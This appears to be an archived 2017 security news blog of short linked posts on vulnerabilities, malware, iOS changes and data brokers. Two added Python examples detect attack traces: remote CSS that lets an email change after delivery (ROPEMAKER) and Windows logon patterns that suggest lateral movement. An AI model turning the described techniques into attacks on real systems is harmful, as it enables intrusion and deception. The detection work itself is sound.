Contrary to popular belief, a new number is not a “get out of jail free” card. For one, it’s not that easy to secure a different number. According to AARP, only 400 new numbers were issued in 2016, despite having over 15 million people victimized by identity theft.


For More Info:
https://www.cheatsheet.com/money-career/worst-mistake-you-can-make-with-your-social-security-number.html/?a=viewall

Tuesday, September 26, 2017

Security flaw that could allow remote access (iPhone, Android and others). iOS 11 not affected

According to a report from Google Project Zero, a security flaw has been found in iPhones and other devices that use Broadcom Wi-Fi chips. The weakness allows a hacker to remotely take over the device knowing only the MAC address or network-port ID. Since the MAC address of a connected device is easily obtained, it is considered a serious threat

iPhones aren't the only devices at risk. Beniamini has confirmed that Apple TV, Android phones (including the S7 Edge), select routers and smart TVs are also "at risk."


For More Info:
https://www.techspot.com/news/71146-security-flaw-found-broadcom-chipset-allows-hackers-hijack.html

Did you know - New Security Measures in iOS 11 - Establishing Trust with a PC Now Requires a Passcode

In previous versions of the system (which includes iOS 8.x through iOS 10.x), establishing a trusted relationship only required confirming the “Trust this computer?” prompt on the device screen. Notably, one still had to unlock the device in order to access the prompt; however, fingerprint unlock would work perfectly for this purpose.

iOS 11 modifies this behaviour by requiring an additional second step after the initial “Trust this computer?” prompt has been confirmed. During the second step, the device asks for the passcode in order to complete pairing.


For More:
https://blog.elcomsoft.com/2017/09/new-security-measures-in-ios-11-and-their-forensic-implications/

Authentication - PIN, Touch ID, Face ID - Pros and Cons.



Here is an excellent article that provides some clarification

https://www.troyhunt.com/face-id-touch-id-pins-no-id-and-pragmatic-security/

Friday, September 22, 2017

Enterprise Security Blind spots


(no surprise here)
61 percent of respondents said that the main security blind spot in the enterprise is unmanaged devices, followed by out-of-date systems, applications and programs at 55 percent.





More Here:
http://www.zdnet.com/article/hackers-reveal-leading-enterprise-security-blind-spots/

Not a joke - Hacker does NOT want money, demands nude picture



MalwareHunterTeam tweeted out news of a screenlocker posing as ransomware where the bad guys request nude photos of the victim instead of money


More Here:
https://www.scmagazine.com/hacker-asks-for-nude-photos-of-victim-instead-of-money-to-unlock-computer/article/695137/

Wednesday, September 20, 2017

Updated Metasploit Cheat Sheet from SANS

iOS Feature (not bug) - Turning Off Wi-Fi and Bluetooth in Control Center Doesn’t Actually Turn Off Wi-Fi or Bluetooth



From the Article:

To be clear, and to be fair, this behavior is exactly what Apple wants. In its own documentation, the company says that "in iOS 11 and later, when you toggle the Wi-Fi or Bluetooth buttons in Control Center, your device will immediately disconnect from Wi-Fi and Bluetooth accessories. Both Wi-Fi and Bluetooth will continue to be available." That is because Apple wants the iPhone to be able to continue using AirDrop, AirPlay, Apple Pencil, Apple Watch, Location Services, and other features, according to the documentation.

For More Info
https://motherboard.vice.com/en_us/article/evpz7a/turn-off-wi-fi-and-bluetooth-apple-ios-11

Tuesday, September 19, 2017

Interesting (and a bit scary) - Red Alert 2.0 (Trojan) can block incoming calls (from my Bank?)

How come the people who make products can't be this smart?



Red Alert 2.0 (Trojan) continues to be updated with functionality recently added to block incoming calls from banks, including those which may be from financial fraud departments investigating potential malicious activity.


More here:
https://www.tripwire.com/state-of-security/featured/red-alert-android-banking-trojan/

Monday, September 18, 2017

Four Cheat Sheets for Malware Analysis from SANS



  1. Reverse-Engineering Malicious Code 
  2. REMnux Usage Tips for Malware Analysis on Linux 
  3. Analyzing Malicious Documents 
  4. Malware Analysis and Reverse-Engineering 


Get it here:
https://digital-forensics.sans.org/blog/2017/09/13/malware-analysis-cheat-sheets

Thursday, September 14, 2017

Have you heard of Consumer Scores? If the answer is NO, then you have not heard of "Data Brokers" either.


Data brokers are companies which collect personal information on people through both public and private sources—from court records to websites to store sales—and provide it to a wide range of buyers.

It’s unknown exactly how many data brokers operate in the United States, because so many keep a low profile. Credible estimates range from 2,500 to 4,000.

A consumer score is a computer-generated number that attempts to predict your likelihood to get sick, or to pay off a debt. Consumer scores are similar to FICO credit scores, but aren’t regulated as to what factors can be used and how transparent the score and its contributing factors are to the scored individual.


There are three causes for concern.
First, consumer scores are a secret. If those who sell them are evasive about explaining details, those who use them usually are almost totally unknown.

Second, collected data is often incorrect. “We found a 50 percent accuracy rate in Acxiom data we looked at,” says Dixon, “and they are considered among the best.”

Third, and most disturbing, there’s nothing consumers can do about any of this. They don’t know what data is being collected, or by whom. They don’t know what’s being done with it. They don’t know where it is going.


For More Info:
http://www.newsweek.com/secretive-world-selling-data-about-you-464789

What happens if you don't patch your system - Ask Equifax


Everyone wants to go to heaven, but no one wants to die.
Every company wants to be fully protected, but most of them don't want to patch (in time).

As the Apache Foundation pointed out earlier this week, CVE-2017-5638 was reported in March 2017.


BTW.
The company also appears to have suffered another data breach, this time in Argentina, where Brian Krebs reports that “an online portal designed to let Equifax employees in Argentina manage credit report disputes from consumers in that country was wide open, protected by perhaps the most easy-to-guess password combination ever: ‘admin/admin’.”


For More info:
https://www.theregister.co.uk/2017/09/14/missed_patch_caused_equifax_data_breach/

Thursday, September 7, 2017

Are You Really Buying Spring Water?


Water sold in a bottle may be labeled distilled, spring, mineral, artesian or sparkling to name a few. More than 17 million barrels of oil are used in the manufacture of bottled water and 50 billion water bottles are used and discarded every year. The cost of bottled water may be as much as 2,000 times more than tap water; 8 glasses of water each day from your tap costs approximately 49 cents per year while the same amount in bottled water costs $1,400.

For More details:
http://articles.mercola.com/sites/articles/archive/2017/09/06/are-you-really-buying-spring-water.aspx

Wednesday, August 30, 2017

Single SpamBot had 711 million records of which 80 million are credentials


“Just for a sense of scale, that’s almost one address for every single man, woman and child in all of Europe,” Hunt wrote.

The spambot is called Onliner and it’s been around since 2016 and is best known for spreading the Ursnif banking Trojan.


For more info:
https://threatpost.com/spambot-contains-mind-boggling-amount-of-email-smtp-credentials/127722/

Friday, August 25, 2017

Can you change a benign email to a malicious one after it has been sent? - YES, we have ROPEMAKER




ROPEMAKER stands for Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky.

A successful Ropemaker attack could allow an attacker to remotely modify the content of an email that the attacker themselves sent, for example swapping a URL for a malicious one.

This can be done even after the email has already been delivered to the recipient and made it through all the necessary spam and security filters, without requiring direct access to the recipient’s computer or email application, exposing hundreds of millions of desktop email client users to malicious attacks.


More Details Here:
https://thehackernews.com/2017/08/change-email-content.html
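The post-delivery change described above only works when the mail client fetches something at view time that the sender still controls; in the published ROPEMAKER write-up that something is remote CSS (a remote stylesheet or a CSS @import). The following added example, which is not code from the blog or from the researchers, is a defender-side check that flags HTML mail bodies carrying such remote stylesheet references. The two sample messages and the host name cdn.example are constructed for this example.

```python
import re
from html.parser import HTMLParser

# A CSS @import that points at a remote (http/https) resource.
IMPORT_RE = re.compile(
    r"@import\s+(?:url\()?\s*['\"]?(https?://[^'\")\s]+)", re.IGNORECASE)


class RemoteCssFinder(HTMLParser):
    """Collect stylesheet references that are fetched only when the mail is viewed."""

    def __init__(self):
        super().__init__()
        self.remote = []          # list of (kind, url)
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "link" and "stylesheet" in a.get("rel", "").lower():
            if a.get("href", "").lower().startswith(("http://", "https://")):
                self.remote.append(("link", a["href"]))
        elif tag == "style":
            self._in_style = True

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        # HTMLParser hands the raw text of a <style> block to handle_data.
        if self._in_style:
            for url in IMPORT_RE.findall(data):
                self.remote.append(("import", url))


def remote_css_references(html_body: str):
    """Return every remote stylesheet reference found in an HTML mail body."""
    p = RemoteCssFinder()
    p.feed(html_body)
    p.close()
    return p.remote


def is_mutable_after_delivery(html_body: str) -> bool:
    """True if the rendered content can still change after delivery."""
    return bool(remote_css_references(html_body))


# Constructed sample messages (not real mail).
STATIC_MAIL = ("<html><body><p>Please review the "
               "<a href='https://example.com/invoice'>invoice</a>.</p></body></html>")

MUTABLE_MAIL = """<html><head>
<link rel="stylesheet" href="https://cdn.example/style.css">
<style>@import url("https://cdn.example/more.css");</style>
</head><body>
<p>Open <a class="a" href="https://example.com/invoice">this link</a>
<a class="b" href="https://example.com/other">this link</a></p>
</body></html>"""

if __name__ == "__main__":
    for name, body in (("static", STATIC_MAIL), ("mutable", MUTABLE_MAIL)):
        print(name, remote_css_references(body))
```

A gateway or client that blocks remote CSS (or renders mail as plain text) removes the lever; this check is the triage step that tells you which messages have it. Remote images are fetched the same way but cannot rewrite text, so they are deliberately not flagged here.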

Thursday, August 24, 2017

Dark Side of Technology - Sound based hacks (CovertBand)





  • Detect people’s activities
  • Induce false readings in a phone’s accelerometer
  • Disrupt balancing gyroscopes, such as those in drones and hoverboards
  • Remotely hack into air-gapped computers
  • Act as a covert sonic weapon


More details here:
https://www.fastcompany.com/40455626/hack-music-can-watch-you-through-your-devices

Tuesday, August 22, 2017

Check whether your password is already on a compromised-password list


You think you have a strong password
Or
You create a new password and you believe it is good enough

Are you sure it is not part of the compromised password list?


Go to the site below and test your password.

https://haveibeenpwned.com/Passwords

Thursday, July 20, 2017

Wannacry and NotPetya are just the beginning - Can you detect lateral movement from Event Logs - Yes but how?




Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) has an excellent document.


Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) extracted tools used by many attackers by investigating recently confirmed cases of targeted attacks. Then, research was conducted to investigate what kind of logs were left on the server and clients by using such tools, and what settings need to be configured to obtain logs that contain sufficient evidential information. This report is a summary of the results of this research.

The following page has a PDF link:

https://www.jpcert.or.jp/english/pub/sr/ir_research.html
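To make the "yes, but how?" concrete, here is one of the simplest signals that survives in the Windows Security log: a single account authenticating over the network (event 4624 with LogonType 3) to an unusual number of distinct hosts in a short window. The following is an added example, not JPCERT/CC's tooling and not taken from the report; the event records are constructed JSON-lines renderings of the kind a log forwarder or SIEM emits, with field names taken from 4624's EventData (TargetUserName, IpAddress, LogonType) plus the reporting Computer.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real log data). One JSON object per line.
EVENTS_JSONL = """\
{"time": "2017-07-20T09:00:05", "EventID": 4624, "LogonType": 3, "TargetUserName": "svc_backup", "IpAddress": "10.0.0.15", "Computer": "FILE01"}
{"time": "2017-07-20T09:01:10", "EventID": 4624, "LogonType": 2, "TargetUserName": "jdoe", "IpAddress": "127.0.0.1", "Computer": "WS01"}
{"time": "2017-07-20T09:02:00", "EventID": 4624, "LogonType": 3, "TargetUserName": "jdoe", "IpAddress": "10.0.0.42", "Computer": "WS02"}
{"time": "2017-07-20T09:02:30", "EventID": 4624, "LogonType": 3, "TargetUserName": "jdoe", "IpAddress": "10.0.0.42", "Computer": "WS03"}
{"time": "2017-07-20T09:03:15", "EventID": 4624, "LogonType": 3, "TargetUserName": "jdoe", "IpAddress": "10.0.0.42", "Computer": "FILE01"}
{"time": "2017-07-20T09:03:20", "EventID": 4624, "LogonType": 3, "TargetUserName": "WS02$", "IpAddress": "10.0.0.42", "Computer": "DC01"}
{"time": "2017-07-20T09:04:40", "EventID": 4624, "LogonType": 3, "TargetUserName": "jdoe", "IpAddress": "10.0.0.42", "Computer": "DC01"}
{"time": "2017-07-20T09:05:00", "EventID": 4624, "LogonType": 3, "TargetUserName": "svc_monitor", "IpAddress": "10.0.0.7", "Computer": "WS02"}
{"time": "2017-07-20T09:05:01", "EventID": 4624, "LogonType": 3, "TargetUserName": "svc_monitor", "IpAddress": "10.0.0.7", "Computer": "WS03"}
{"time": "2017-07-20T09:30:00", "EventID": 4624, "LogonType": 3, "TargetUserName": "jdoe", "IpAddress": "10.0.0.42", "Computer": "WS05"}
"""


def parse_events(jsonl: str):
    """Parse JSON-lines events, converting the timestamp to datetime."""
    events = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        e["time"] = datetime.fromisoformat(e["time"])
        events.append(e)
    return events


def lateral_movement_candidates(events, window=timedelta(minutes=10), min_hosts=4):
    """Return {account: {"hosts": [...], "from": [...]}} for every user account
    that logged on over the network to at least min_hosts distinct computers
    within any sliding window of the given length."""
    by_account = defaultdict(list)
    for e in events:
        name = e.get("TargetUserName", "")
        # Only successful network logons by user accounts; machine accounts
        # (names ending in "$") talk to many hosts legitimately.
        if e.get("EventID") == 4624 and e.get("LogonType") == 3 and not name.endswith("$"):
            by_account[name].append(e)

    flagged = {}
    for account, evs in by_account.items():
        evs.sort(key=lambda x: x["time"])
        for i, start in enumerate(evs):
            hosts, sources = set(), set()
            for e in evs[i:]:
                if e["time"] - start["time"] > window:
                    break
                hosts.add(e["Computer"])
                sources.add(e["IpAddress"])
            if len(hosts) >= min_hosts:
                flagged[account] = {"hosts": sorted(hosts), "from": sorted(sources)}
                break
    return flagged


if __name__ == "__main__":
    for account, detail in lateral_movement_candidates(parse_events(EVENTS_JSONL)).items():
        print(f"{account}: {len(detail['hosts'])} hosts from {detail['from']}: {detail['hosts']}")
```

The threshold and window are tuning knobs, and backup, monitoring and administration accounts will trip this rule legitimately, so pair it with an allow-list of expected account-to-host relationships. The rule also depends on 4624 being collected from workstations and member servers, not only domain controllers; the report's point about which audit settings are needed applies directly here.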